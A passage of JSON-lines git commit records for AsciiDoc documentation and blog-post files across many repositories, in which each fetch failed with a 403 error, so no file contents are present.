URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c1f7390f8a2b0dcde2b7fe751ce866cd7b3caa3","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9fbe944417f3512b34ccbddbe001bf61b7342b8","subject":"Add draft of the JS module processing improvements blog post","message":"Add draft of the JS module processing improvements blog post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-12-clojurescript-is-not-an-island-integrating-node-modules.adoc","new_file":"content\/news\/2017-07-12-clojurescript-is-not-an-island-integrating-node-modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f88131a393aeca30243601df523ca59d337ee11b","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68856c5be4ad8bb2ae13ed115e3b2770a9966c7b","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e92234418b54c124c17bcb77a4dae00402766a48","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87ff3568e0d4bdd0f65577c6bc92e92b4921203e","subject":"added plantuml exampler","message":"added plantuml exampler\n","repos":"tsypuk\/springrestdoc","old_file":"asciidocisawsome\/src\/docs\/asciidoc\/index.adoc","new_file":"asciidocisawsome\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsypuk\/springrestdoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"670fec851152c86a16c6e6b2fc583ac183f6c332","subject":"Add parsers doc","message":"Add parsers doc\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/core\/parsers.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/core\/parsers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wilkerlucio\/pathom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dae762913d66e4387395cbd7f3ae5e25d39c4b77","subject":"[DOCS] Added xpack.monitoring.ui.enabled to monitoring settings.","message":"[DOCS] Added xpack.monitoring.ui.enabled to monitoring settings.\n\nOriginal commit: elastic\/x-pack-elasticsearch@3dd136ed57e08e4a2bea311f2be9f14ec54cc368\n","repos":"scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"112ad56ac1590cb11603fbdc0caf76de54348abf","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed37c14b89ed1fb9e03c973395fac509ecb8062d","subject":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","message":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a3421c9529816f49128916f5da0ea7a0ca5926","subject":"Update 2017-10-28-thirty-five-minutes.adoc","message":"Update 2017-10-28-thirty-five-minutes.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-10-28-thirty-five-minutes.adoc","new_file":"_posts\/2017-10-28-thirty-five-minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8535211f9d3f9871ca4706ce7fa98268b5c4912f","subject":"Update 2017-05-19-Network-Construction.adoc","message":"Update 2017-05-19-Network-Construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-Network-Construction.adoc","new_file":"_posts\/2017-05-19-Network-Construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b4fb504c05424bb8707026dcf604bc5e8784884","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b945fd9afd8e4fb347b9bf45d72ed635d6080c23","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f32a1c5c66032c4ffd0690e5b2b92c316c7823","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76dc04398b9c736f8be4145823dc7d352f13f1f9","subject":"Add 2017-06-09-forge-3.7.0.final.asciidoc","message":"Add 2017-06-09-forge-3.7.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-06-09-forge-3.7.0.final.asciidoc","new_file":"news\/2017-06-09-forge-3.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0af3643c7454762d69639ea8ca8890469df008a8","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5085c6541dec792ce9bcd45613fc60d1003ca336","subject":"y2b create post Never Plug Your iPhone In Again...","message":"y2b create post Never Plug Your iPhone In Again...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-06-Never-Plug-Your-iPhone-In-Again.adoc","new_file":"_posts\/2017-06-06-Never-Plug-Your-iPhone-In-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6511328b166e220b52f964d5efdf7c332506720e","subject":"y2b create post I Can't Believe These Are Only $20 Bucks","message":"y2b create post I Can't Believe These Are Only $20 Bucks","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-19-I-Cant-Believe-These-Are-Only-20-Bucks.adoc","new_file":"_posts\/2017-04-19-I-Cant-Believe-These-Are-Only-20-Bucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89577a59385ef96b61e1e5cc873329311ca490f5","subject":"curationdomain documentation","message":"curationdomain documentation\n","repos":"EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4","old_file":"webapps\/core\/src\/main\/asciidoc\/cookbook_recipes\/curation_domains.adoc","new_file":"webapps\/core\/src\/main\/asciidoc\/cookbook_recipes\/curation_domains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBIBioSamples\/biosamples-v4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a697412b924489bb0e2012e414a245766a5e1f2","subject":"y2b create post Deal Therapy: Rubber Band Shotgun, MacBook Pro, 84\\","message":"y2b create post Deal Therapy: Rubber Band Shotgun, MacBook Pro, 84\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-22-Deal-Therapy-Rubber-Band-Shotgun-MacBook-Pro-84.adoc","new_file":"_posts\/2013-03-22-Deal-Therapy-Rubber-Band-Shotgun-MacBook-Pro-84.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11c0f93b0786d6a7d193cc9b733d6059a579016e","subject":"added cbauth README","message":"added cbauth README\n\nChange-Id: I4f69bd5646ad879808dc2440f50bcd00622962a6\nReviewed-on: http:\/\/review.couchbase.org\/45897\nReviewed-by: Aliaksey Artamonau <3c875bcfb3adf2a65b2ae7686ca921e6c9433147@gmail.com>\nTested-by: Aliaksey Artamonau <3c875bcfb3adf2a65b2ae7686ca921e6c9433147@gmail.com>\n","repos":"couchbase\/cbauth,couchbase\/cbauth","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbase\/cbauth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40a1a7b8b6312f8727386eb78a59ac6e4315c9dc","subject":"Update 2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","message":"Update 2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","new_file":"_posts\/2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df8fec04fb9dcc0d04bd7380b69c2d060837371b","subject":"Update 2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","message":"Update 2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","new_file":"_posts\/2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c896d7e198612a2efcb198611a7c8151ea589224","subject":"Update 2017-06-12-1336-Test.adoc","message":"Update 2017-06-12-1336-Test.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2017-06-12-1336-Test.adoc","new_file":"_posts\/2017-06-12-1336-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d457e87a0003c55b5226368dac67549541381dfa","subject":"Publish 2016-7-2-easywechat.adoc","message":"Publish 2016-7-2-easywechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-easywechat.adoc","new_file":"2016-7-2-easywechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93fc929998201995f1070d6e5ade8de11b2bc82e","subject":"module-authscan.adoc: Document authscan.cpp module, RNS-1203.","message":"module-authscan.adoc: Document authscan.cpp module, RNS-1203.\n","repos":"ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee","old_file":"docs\/reference-manual\/module-authscan.adoc","new_file":"docs\/reference-manual\/module-authscan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/b1v1r\/ironbee.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ef9233921cb9afd8000cc6a7d219c1f09df427f","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58b64eaf223941b26927a70bbc76beb16aeeb721","subject":"Update 2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","message":"Update 2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","new_file":"_posts\/2017-11-02-Meetup-Paris-Cognitives-Services-2-Azure-Vision.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa88f0a7b01f88976a0e2f39f8f3f0996c5fee2d","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49512970fd65b426f24f4d030c676ec05344900c","subject":"Corrected some grammatical errors","message":"Corrected some grammatical errors\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34e1b419764c3f6d50ac9ae41bc3897e57c89534","subject":"y2b create post Ion iCADE Arcade Cabinet for iPad \\u0026 iPad 2","message":"y2b create post Ion iCADE Arcade Cabinet for iPad \\u0026 iPad 2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-02-Ion-iCADE-Arcade-Cabinet-for-iPad-u0026-iPad-2.adoc","new_file":"_posts\/2011-08-02-Ion-iCADE-Arcade-Cabinet-for-iPad-u0026-iPad-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73e148cc4e857389c86a8aed149e7741c399aea3","subject":"Update 2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","message":"Update 2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","new_file":"_posts\/2015-10-12-Smart-Health-Management-Part-3-Quantified-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba5386e3ec3a7a49b6cc9bde1cb12c4771a33961","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"965fb63da907645d76db25a038ca44d1a2959ec4","subject":"Update 2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","message":"Update 2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","new_file":"_posts\/2015-07-15-Testing-ASPNET-Web-API-with-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6844bcd16e762de7e6c9a73a7cf2fb1d16058659","subject":"Update 2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","message":"Update 2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","new_file":"_posts\/2015-10-06-Java8-et-JavaEE7-sont-dans-le-meme-POM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2478ff7d689577ca8c7244fce38e322af61ac7f5","subject":"#169: added README for entity","message":"#169: added README for entity\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"entity\/README.adoc","new_file":"entity\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"517ca7dfc326ecc63a93c21525ded1f1fa1d0886","subject":"papers","message":"papers\n","repos":"mannyfin\/IRAS,mannyfin\/IRAS","old_file":"GUA work\/GUA papers\/Quick Notes on papers\/GUA info.adoc","new_file":"GUA work\/GUA papers\/Quick Notes on papers\/GUA info.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mannyfin\/IRAS.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b69af33648c5c011c8bfcd2bdde46df501f2ac43","subject":"Update 2017-05-19-I-want-faster-IDE.adoc","message":"Update 2017-05-19-I-want-faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-19-I-want-faster-IDE.adoc","new_file":"_posts\/2017-05-19-I-want-faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b92e8c1778098259982c858852c6ac975cc6eee","subject":"Update 2016-01-18-Level-up-your-programming-skills.adoc","message":"Update 2016-01-18-Level-up-your-programming-skills.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-01-18-Level-up-your-programming-skills.adoc","new_file":"_posts\/2016-01-18-Level-up-your-programming-skills.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac7d935309a5b0dfdea6cd3b3e7cda0a7134bea5","subject":"Update 2015-11-06-Test.adoc","message":"Update 2015-11-06-Test.adoc","repos":"adest\/press,adest\/press,adest\/press","old_file":"_posts\/2015-11-06-Test.adoc","new_file":"_posts\/2015-11-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adest\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a44e51efd30c3bdf47e50572621bea95e359896c","subject":"Create 2017-27-05-test.adoc","message":"Create 2017-27-05-test.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-27-05-test.adoc","new_file":"_posts\/2017-27-05-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63abb612e6e982d18ef3816c3b048e344f3ac7aa","subject":"Update dbm-changelog-sync-sql.adoc","message":"Update 